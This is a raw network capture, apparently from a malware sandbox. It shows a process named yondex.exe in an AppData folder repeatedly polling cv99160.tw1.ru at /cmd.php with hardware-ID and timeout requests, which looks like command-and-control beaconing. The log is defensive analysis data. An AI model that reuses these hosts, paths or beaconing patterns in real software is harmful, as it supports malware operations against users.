                                                                              2024-06-23 09:33:57 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:33:57 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:33:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=39f21fb076571cf0a3cc2a0ce3b230f8; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:33:57 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              106 | 192.168.2.4 | 49850 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:00 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:00 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=aec18e3f60e505b810e0dc3fdc9a435e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              107 | 192.168.2.4 | 49851 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:01 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:02 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:02 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=56ad6948c0f0de49f19421293d276ed9; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:02 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              108 | 192.168.2.4 | 49852 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:03 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:03 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=e243a82f7d1fe4cdb0aaddadba0106bb; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              109 | 192.168.2.4 | 49853 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:04 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:04 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:04 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=40e2762714a7c021d8ff77fb46ea606c; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:04 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              110 | 192.168.2.4 | 49854 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:07 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:08 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:07 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=1c9f2b82e667986962b3cd7564aa0ff4; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.4 | 49855 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:34:08 UTC | 148 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:34:09 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:34:09 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=3bead8d61655891095023b04bcdd1625; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.4 | 49856 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:34:09 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:34:10 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:34:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1
Connection: close
Set-Cookie: PHPSESSID=cb9ea5e2eccba66033dc098ddb50257a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
2024-06-23 09:34:10 UTC | 1 | IN | Data Raw: 31
Data Ascii: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.4 | 49857 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:34:11 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:34:11 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:34:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=6774ebaa5911cfd3f230cd7f2a6bfd53; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.4 | 49858 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:34:12 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:34:12 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:34:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1
Connection: close
Set-Cookie: PHPSESSID=4d067782ceea1c1b531283c80f1fa242; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
2024-06-23 09:34:12 UTC | 1 | IN | Data Raw: 31
Data Ascii: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.4 | 49859 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:34:15 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:34:15 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:34:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=579aa3f864adfa2e305cd11b65eb6402; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.4 | 49860 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:34:16 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:34:16 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:34:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1
Connection: close
Set-Cookie: PHPSESSID=4028b942615069fd4b9aabd677bc0e81; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
2024-06-23 09:34:16 UTC | 1 | IN | Data Raw: 31
Data Ascii: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.4 | 49861 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:34:17 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:34:17 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:34:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=78364f0c15bd5c585af0cdcddce922b7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.4 | 49862 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:34:18 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:34:18 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:34:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1
Connection: close
Set-Cookie: PHPSESSID=07be0d2ace01a51e7e8c8c64085cb53b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
2024-06-23 09:34:18 UTC | 1 | IN | Data Raw: 31
Data Ascii: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.4 | 49863 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:34:20 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:34:21 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:34:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=148962df435ecd7d4e806d65a0caca77; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.4 | 49864 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:34:21 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:34:22 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:34:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1
Connection: close
Set-Cookie: PHPSESSID=63f0ab212bca379ec4e7ddc50177ba1f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
2024-06-23 09:34:22 UTC | 1 | IN | Data Raw: 31
Data Ascii: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.4 | 49865 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:34:24 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:34:24 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:34:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=119687fb8ed39799f405e4cb4b6adb89; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
122 | 192.168.2.4 | 49866 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:34:25 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:34:25 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:34:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1
Connection: close
Set-Cookie: PHPSESSID=2a3a1f444c786762b7ebdc0a58c25320; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
2024-06-23 09:34:25 UTC | 1 | IN | Data Raw: 31
Data Ascii: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
123 | 192.168.2.4 | 49867 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:34:26 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:34:27 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:34:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=cee663817d4543b7e91366c7a47f01f0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
124 | 192.168.2.4 | 49868 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:34:27 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
2024-06-23 09:34:28 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:34:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1
Connection: close
Set-Cookie: PHPSESSID=d20ad4ea73d9af2b4db81a9141d2f648; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
2024-06-23 09:34:28 UTC | 1 | IN | Data Raw: 31
Data Ascii: 1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
125 | 192.168.2.4 | 49869 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-23 09:34:30 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: cv99160.tw1.ru
Connection: Keep-Alive
2024-06-23 09:34:30 UTC | 357 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Sun, 23 Jun 2024 09:34:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Set-Cookie: PHPSESSID=e842312572562a43ac595fab0ffa31b0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              126 | 192.168.2.4 | 49870 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:31 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:31 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:31 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=4c3346c97ea1ffa92890a8bfaf9aaaf9; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:31 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              127 | 192.168.2.4 | 49871 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:33 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:33 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:33 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=4d9c4549176287e452d454fdc5e074ff; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              128 | 192.168.2.4 | 49872 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:34 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:34 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:34 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=c72cc42470a6f248c7b34324bc283f47; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:34 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              129 | 192.168.2.4 | 49873 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:35 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:36 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=bc6eeafc781b36ad3d2598e6f73176e4; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              130 | 192.168.2.4 | 49874 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:37 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:37 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:37 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=b804a33d8dac627dc87f9b83cba92e71; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:37 UTC | 1 | IN | Data Raw: 31
                                                                              Data Ascii: 1


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              131 | 192.168.2.4 | 49875 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:39 UTC | 172 | OUT | GET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:39 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:39 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=39f8a823c95e1d6b93f07183d0152294; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              132 | 192.168.2.4 | 49876 | 92.53.96.121 | 443 | 8064 | C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-06-23 09:34:40 UTC | 144 | OUT | GET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:40 UTC | 357 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=5a8d42da7a32277ea202bfe20cdcefd5; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
